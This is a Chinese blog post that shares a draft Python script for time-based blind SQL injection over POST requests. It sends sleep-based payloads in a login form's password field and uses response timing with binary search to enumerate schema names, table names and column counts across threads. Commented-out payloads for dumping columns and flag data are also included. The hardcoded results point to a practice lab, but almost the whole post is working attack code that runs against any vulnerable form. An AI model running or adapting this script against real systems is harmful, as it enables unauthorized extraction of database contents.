首页 > 其他分享 >post时间盲注注入脚本之查询表字段数--草稿

post时间盲注注入脚本之查询表字段数--草稿

时间:2023-08-05 17:55:36浏览次数:42  
标签:name -- scheName 段数 mid high low post self

import requests
import sys
import time
import pdb
import threading
from concurrent.futures import ThreadPoolExecutor




class Injection():
    def __init__(self):
        self.url = ""
        #self.scheNum=0
        self.scheNum=7
        #self.scheLen = []
        self.scheLen = [18, 10, 5, 5, 18, 7, 8]
        #self.scheName = []
        #self.scheName = ['information_schema','challenges','jf123','mysql','performance_schema','pikachu','security']
        #self.scheName = [['information_schema', 40], ['challenges', 1], ['jf123', 1], ['mysql', 24], ['performance_schema', 17], ['pikachu', 5], ['security', 4]]
        #self.scheName = [['information_schema', 40, 14, 10, 37, 7, 17, 7, 6, 5, 13, 16, 16, 10, 10, 7, 11, 9, 23, 8, 8, 17, 14, 17, 10, 6, 11, 17, 16, 8, 15, 5, 18, 10, 24, 17, 13, 10, 12, 19, 16, 22], ['challenges', 1, 10], ['jf123', 1, 10], ['mysql', 24, 12, 2, 5, 4, 11, 13, 12, 13, 10, 4, 16, 6, 4, 10, 12, 7, 8, 11, 9, 21, 14, 20, 25, 4], ['performance_schema', 17, 14, 20, 20, 25, 32, 40, 40, 14, 26, 24, 15, 18, 16, 15, 17, 12, 7], ['pikachu', 5, 8, 6, 7, 5, 8], ['security', 4, 6, 8, 7, 5]]
        self.scheName = [['information_schema', 40, 'CHARACTER_SETS', 'COLLATIONS', 'COLLATION_CHARACTER_SET_APPLICABILITY', 'COLUMNS', 'COLUMN_PRIVILEGES', 'ENGINES', 'EVENTS', 'FILES', 'GLOBAL_STATUS', 'GLOBAL_VARIABLES', 'KEY_COLUMN_USAGE', 'PARAMETERS', 'PARTITIONS', 'PLUGINS', 'PROCESSLIST', 'PROFILING', 'REFERENTIAL_CONSTRAINTS', 'ROUTINES', 'SCHEMATA', 'SCHEMA_PRIVILEGES', 'SESSION_STATUS', 'SESSION_VARIABLES', 'STATISTICS', 'TABLES', 'TABLESPACES', 'TABLE_CONSTRAINTS', 'TABLE_PRIVILEGES', 'TRIGGERS', 'USER_PRIVILEGES', 'VIEWS', 'INNODB_BUFFER_PAGE', 'INNODB_TRX', 'INNODB_BUFFER_POOL_STATS', 'INNODB_LOCK_WAITS', 'INNODB_CMPMEM', 'INNODB_CMP', 'INNODB_LOCKS', 'INNODB_CMPMEM_RESET', 'INNODB_CMP_RESET', 'INNODB_BUFFER_PAGE_LRU'], ['challenges', 1, 'kefgu88kuc'], ['jf123', 1, 'jf_content'], ['mysql', 24, 'columns_priv', 'db', 'event', 'func', 'general_log', 'help_category', 'help_keyword', 'help_relation', 'help_topic', 'host', 'ndb_binlog_index', 'plugin', 'proc', 'procs_priv', 'proxies_priv', 'servers', 'slow_log', 'tables_priv', 'time_zone', 'time_zone_leap_second', 'time_zone_name', 'time_zone_transition', 'time_zone_transition_type', 'user'], ['performance_schema', 17, 'cond_instances', 'events_waits_current', 'events_waits_history', 'events_waits_history_long', 'events_waits_summary_by_instance', 'events_waits_summary_by_thread_by_event_', 'events_waits_summary_global_by_event_nam', 'file_instances', 'file_summary_by_event_name', 'file_summary_by_instance', 'mutex_instances', 'performance_timers', 'rwlock_instances', 'setup_consumers', 'setup_instruments', 'setup_timers', 'threads'], ['pikachu', 5, 'httpinfo', 'member', 'message', 'users', 'xssblind'], ['security', 4, 'emails', 'referers', 'uagents', 'users']] 
        #self.scheName = [['security', 4, 'emails', 'referers', 'uagents', 'users']]
        self.headers = {
                "Content-Type":"application/x-www-form-urlencoded"
        }
    def schemaNum(self):
        high = 30
        low = 1
        mid = (low + high) // 2
        while high > low:
            payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sleep(5),0)-- +"       #查库名
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"        #查表名
            #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"        #查列名
            #payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"       #查数据
            data = {
                "uname":"admin",
                "passwd":payload,
                "submit":"Submit"
            }        
            last = int(time.time())
            try:
                res = requests.post(self.url, data = data)
            except Exception as e:
                print(e) 
            finally:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
                self.scheNum=high
                #break
                return
        #print(low,mid)
        self.scheNum=mid
    def usage(self):
        if len(sys.argv)!=2:
            print('The number of parameter number not right')
            print('Usage:python3 %s url '% sys.argv[0])
            print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password")
            sys.exit(-1)
        self.url = sys.argv[1] 
    def schemataLength(self):
        #pdb.set_trace()
        for i in range(self.scheNum):
            high = 30
            low = 1
            mid = (low + high) // 2
            flag=0
            while high > low:
                #print(high,low,mid,end=" ")
                payload = f"1' or if((select length(schema_name) from information_schema.schemata limit {i},1)>{mid},sleep(1),0)#"       #查库名
                data = {
                    "uname":"admin",
                    "passwd":payload,
                    "submit":"Submit"
                }        
                last = int(time.time())
                try:
                    res = requests.post(self.url,headers=self.headers,data = data)
                except Exception as e:
                    print(e)
                finally:
                    now = int(time.time())
                #pdb.set_trace()
                #print(now-last)
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
                    self.scheLen.append(high)
                    flag=1
                    break
            if flag==1:
                continue
            self.scheLen.append(mid)
    def schemaName(self,theNumDBName,l): # n[1] is the number of databases ;n[2] is the database name length
        name=""
        for i in range(1,l+1):
            high = 127
            low = 32
            mid = (low + high) // 2 
            flag=0
            #pdb.set_trace()
            while high > low:
                payload = f"1' or if(ascii(substr((select schema_name from information_schema.schemata limit {theNumDBName},1),{i},1))>{mid},sleep(0.5),0);-- +"       #查库名
                data = {
                    "uname":"admin",
                    "passwd":payload,
                    "submit":"Submit"
                }        
                last = int(time.time())
                try:
                    res = requests.post(self.url, data = data)
                except Exception as e:
                    print(e) 
                finally:
                    now = int(time.time())
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2
                #print(high,low,mid,name)
                if mid==low and high-low==1:
                    name += chr(int(high))
                    flag=1
                    break
            if flag==1:
                continue
            name += chr(int(low))
        self.scheName.append(name)
    def schethreadMan(self):    #managent the multithread
        t=[]
        for i in range(0,len(self.scheLen)):
            t.append(threading.Thread(target=self.schemaName,args=(i,self.scheLen[i])))
        for i in t:
            i.start()
        for i in t:
            i.join()
    def tablesNum(self,n,scheName): #n :the number of databases ;scheName: the name of the number database 
        high = 40
        low = 0
        mid = (low + high) // 2
        while high > low:
            # guess the tables number of database
            payload = f"1'or if((select count(table_name) from information_schema.tables where table_schema= \'{scheName}\')>{mid},sleep(0.5),0)-- +" 
            data = {
                "uname":"admin",
                "passwd":payload,
                "submit":"Submit"
            }        
            last = int(time.time())
            try:
                res = requests.post(self.url, data = data)
            except Exception as e:
                print(e) 
            finally:
                now = int(time.time())
            if now - last >5 :    
                low = mid
            else :
                high = mid
            mid = (low + high) // 2
            if mid==low and high-low==1:
                #print("The Number of schema is {}".format(high))
                print(f"the {scheName} database has {high} tables")
                self.scheName[n] = [scheName,high]
                #break
                return
        print(f"the {scheName} database has {mid} tables")
        self.scheName[n] = [scheName,mid]
    def tablesThreadMan(self):
        t=[]
        for i in range(0,len(self.scheName)):
            t.append(threading.Thread(target=self.tablesNum,args=(i,self.scheName[i])))
        for i in t:
            i.start()
        for i in t:
            i.join()
    def tableNameLength(self,n,scheName,l): #guess the table name length
        #pdb.set_trace()
        for i in range(l):
            high = 40
            low = 1
            mid = (low + high) // 2
            flag=0
            while high > low:
                #print(high,low,mid,end=" ")
                payload = f"1' or if((select length(table_name) from information_schema.tables where table_schema='{scheName}' limit {i},1)>{mid},sleep(0.5),0)-- +" 
                data = {
                    "uname":"admin",
                    "passwd":payload,
                    "submit":"Submit"
                }        
                last = int(time.time())
                try:
                    res = requests.post(self.url,headers=self.headers,data = data)
                except Exception as e:
                    print(e)
                finally:
                    now = int(time.time())
                #pdb.set_trace()
                #print(now-last)
                if now - last >5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2 
                if mid==low and high-low==1:
                    self.scheName[n].append(high)
                    print(f"the {scheName} database the {i+1} table name length:{high}")
                    flag=1
                    break
            if flag==1:
                continue
            self.scheName[n].append(high)
            print(f"the {scheName} database the {i+1} table name length:{mid}")
    def tableNameLengthThreadMan(self):
        t=[]
        #t.append(threading.Thread(target=self.tableNameLength,args=(0,self.scheName[0][0],self.scheName[0][1])))
        #t[0].start()
        #t[0].join()
        for i in range(0,len(self.scheName)):
            t.append(threading.Thread(target=self.tableNameLength,args=(i,self.scheName[i][0],self.scheName[i][1])))
        for i in t:
            i.start()
        for i in t:
            i.join()
    def tableName(self,n1,scheName,l,n2): # n1:the number of database; scheName :schema name ;l :the table length ;n2: the number of table
        name=""
        for i in range(1,l+1):
            high = 127
            low = 32
            mid = (low + high) // 2 
            flag=0
            #pdb.set_trace()
            while high > low:
                #guess the table name
                payload = f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema = \'{scheName}\' limit {n2-2},1),{i},1))>{mid},sleep(0.5),1);-- +"
                data = {
                    "uname":"admin",
                    "passwd":payload,
                    "submit":"Submit"
                }        
                last = int(time.time())
                try:
                    res = requests.post(self.url, data = data)
                except Exception as e:
                    print(e) 
                finally:
                    now = int(time.time())
                if now - last > 5 :    
                    low = mid
                else :
                    high = mid
                mid = (low + high) // 2
                #print(high,low,mid,name)
                if mid == low and high - low == 1:
                    name += chr(int(high))
                    flag = 1
                    break
            if flag==1:
                continue
            name += chr(int(low))
        self.scheName[n1][n2] = name
        print(f"the {scheName} database {n2-1} table name is:{name}")
    def tableNameThreadMan(self):
        thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量     
        for i in range(len(self.scheName)):
            for j in  range(2,len(self.scheName[i])):
                future = thread_pool.submit(self.tableName,i,self.scheName[i][0],self.scheName[i][j],j)
        #future = thread_pool.submit(self.tableName,0,self.scheName[0][0],self.scheName[0][2],2)
        thread_pool.shutdown(wait=True)
    def columnsNum(self,scheName,tableName): #scheName: the name of the number database ;tableName:the table name
        high = 40
        low = 0
        if not hasattr(str(scheName)+"_"+str(tableName),""):    #增加类属性,定义每个表都为类属性。结构为list,第一个值为表所拥有的字段数           
       setattr(self.__class__,str(scheName)+"_"+str(tableName),[]) mid = (low + high) // 2 #pdb.set_trace() while high > low: # guess the colnmns number of table payload = f"1' or if((select count(table_name) from information_schema.columns where table_schema = \'{scheName}\' and table_name = \'{tableName}\') >{mid},sleep(0.5),0) -- +" data = { "uname":"admin", "passwd":payload, "submit":"Submit" } last = int(time.time()) try: res = requests.post(self.url, data = data) except Exception as e: print(e) finally: now = int(time.time()) if now - last >5 : low = mid else : high = mid mid = (low + high) // 2 #pdb.set_trace() if mid==low and high-low==1: print(f"the {scheName} database {tableName} tables has {high} colnmns") #setattr(self.__class__,str(scheName)+"_"+str(tableName),((getattr(self.__class__,str(scheName)+"_"+str(tableName))).append(high))) temp = getattr(self.__class__,str(scheName)+"_"+str(tableName)) #查询对应表类属性的值 temp.append(high) #将表所拥有字段数添加到对应类属性 setattr(self.__class__,str(scheName)+"_"+str(tableName),temp) #重置类属性的值 #print(f"self.{scheName}_{tableName} = ",getattr(self.__class__,str(scheName)+"_"+str(tableName))) return print(f"the {scheName} database {tableName} tables has {high} colnmns") temp = getattr(self.__class__,str(scheName)+"_"+str(tableName)) temp.append(high) setattr(self.__class__,str(scheName)+"_"+str(tableName),temp) #print(f"self.{scheName}_{tableName} = ",getattr(self.__class__,str(scheName)+"_"+str(tableName))) def columnsNumThreadMan(self): #pdb.set_trace() thread_pool = ThreadPoolExecutor(max_workers = 30) # max_workers指定了复用线程的最大数量,开启线程池 for i in range(len(self.scheName)): for j in range(2,len(self.scheName[i])): future = thread_pool.submit(self.columnsNum,self.scheName[i][0],self.scheName[i][j]) #self.scheName[i][0]为数据库名,self.scheName[i][j]为表名
thread_pool.shutdown(wait=True) #关闭线程池 if __name__ == '__main__': # pdb.set_trace() inject = Injection() inject.usage() #inject.schemataLength() #inject.schethreadMan() #inject.schemataNum() #print(inject.scheNum) #inject.tablesThreadMan() #inject.tableNameThreadMan() #print(inject.scheName) inject.columnsNumThreadMan()

 

标签:name,--,scheName,段数,mid,high,low,post,self
From: https://www.cnblogs.com/xiaoliyulixianji/p/17608316.html

相关文章

  • 硬链接和软链接的区别
    硬链接和软链接的区别1、本质不同硬链接:同一个文件,多个名称。​软链接:不同的文件。2、跨分区硬链接:不支持跨分区。软链接:支持跨分区。3、目录硬链接:不支持对目录创建。​软链接:支持对目录创建。4、相互关系​硬链接:删除某一个硬链接,另一个硬链接不影响使用。​软链......
  • 学不会的博弈论——进阶篇
    前言浅浅复习(我想说,国家队论文yyds......
  • maven相关配置
    环境IntelliJIDEA下载安装(社区版永久免费)JDK下载安装,java默认安装貌似就配置好环境变量了但是idea默认安装的maven没有环境变量 mvn-version  idea安装后会自带maven不需要二次安装,但是不包含jdk,需要单独安装,并在如下位置配置   创建Maven工程  maven工......
  • "hello world"程序的背后
    ​ 今天浅浅分享一下一个hello程序的背后发生了什么​ 首先创建一个hello.c程序#include<stdio.h>intmain(){printf("HelloWorld\n");return0;}​ 其实上述过程可以分解为4个步骤,分别是预处理、编译、汇编、链接,如图所示预处理​ 首先是源代码文件hello......
  • 硬件管理平台-硬件产品库-日志模块
    硬件管理平台-硬件产品库-日志模块log4net本项目使用的是log4net,实际上没有什么原因,也没有怎么进行选型,因为他比较符合log4j,因此选择了log4net,的确有些草率。随着log4j爆出了大漏洞,只能希望log4net是没有的。使用范围使用log4net最主要是给硬件项目使用的,因为硬件项目是反......
  • 离散系统的差分方程
    差分方程连续系统的动态过程采用拉普拉斯变换求解微分方程描述,离散系统的动态过程采用z变换求解差分方程描述。差分方程表示出系统离散输入与离散输出之间的函数关系。一阶前向差分:\[\Deltaf(k)=f(k+1)-f(k)\]二阶前向差分:\[\Delta^2f(k)=\Delta[\Deltaf(k)]=\Deltaf(k+1)......
  • centos7.9 部署mongodb-4.4.18 分片集群
    准备基本环境名称ip地址cpu内存es监听端口redis-65110.0.2.18c64G9200redis-65210.0.2.28c64G9200redis-65310.0.2.38c64G9200......
  • k8s 学习笔记之 Service——Service 介绍和类型
    Service介绍在kubernetes中,pod是应用程序的载体,我们可以通过pod的ip来访问应用程序,但是pod的ip地址不是固定的,这也就意味着不方便直接采用pod的ip对服务进行访问。为了解决这个问题,kubernetes提供了Service资源,Service会对提供同一个服务的多个pod进行聚......
  • 如何通过gRPC传输文件
    在gRPC中,可以通过将文件分割成多个小块,然后使用流式RPC将这些小块发送到服务器来传输文件。以下是一个简单的示例,展示了如何在gRPC中实现文件传输。首先,我们需要定义一个服务来处理文件传输。在.proto文件中,我们可以定义一个UploadFile服务,它接收一个流式的Chunk消息,并返回一个Up......
  • pom.xml
    打包插件<build><plugins><plugin><groupId>org.apache.maven.plugins</groupId><artifactId>maven-shade-plugin</artifactId><version>3.2.4</version>......